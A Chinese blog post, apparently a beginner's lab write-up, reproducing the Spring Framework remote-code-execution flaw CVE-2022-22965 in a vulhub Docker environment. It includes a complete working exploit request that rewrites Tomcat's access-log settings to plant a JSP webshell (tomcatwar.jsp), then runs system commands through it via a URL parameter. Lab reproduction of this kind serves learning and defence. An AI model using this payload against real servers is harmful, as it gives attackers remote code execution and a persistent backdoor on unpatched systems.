【vulhub系列】CVE-2022-22965 Spring Framework远程代码执行漏洞的复现

文章目录


前言

身为一个刚接触网络安全一年不到的新人,我打算记录一下每一次的漏洞复现希望能帮助到更多向我一样的新人。(因为技术有限,如果有做的不对的地方欢迎大佬们在评论区指正,感激不尽。顺便求个关注,谢谢)


提示:以下是本篇文章正文内容,下面案例可供参考

一、漏洞信息

漏洞名称:远程代码执行漏洞

危害等级:中危

漏洞类型:中间件漏洞

漏洞概述:参数绑定造成的变量覆盖漏洞,漏洞点spring-beans包中。Spring MVC 框架的参数绑定功能提供了将请求中的参数绑定控制器方法中参数对象的成员变量,通过 ClassLoader构造恶意请求获取AccessLogValue 对象并注入恶意字段值,来更改 Tomcat 服务器的日志记录属性触发 pipeline 机制写入任意路径下的文件。

二、环境搭建

三、进行漏洞复现

1、进入打开终端,进入目标路径下: 

cd vulhub-master/spring/CVE-2022-22965/

2、打开docker容器:

docker-compose up -d

3、查看开启端口和本机IP:

docker ps        #查看开启端口

ifconfig         #查看本机IP

查看开启端口:

查看ip:

查看环境搭建是否成功:http://192.168.162.129:8080

搭建成功显示的页面如下

POC:

GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1

suffix: %>//
c1: Runtime
c2: <%
DNT: 1

打开抓包工具抓取靶场页面的数据包:并将poc添加进去:

访问:

http://192.168.162.129:8080/tomcatwar.jsp?pwd=j&cmd=id

成功页面:

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值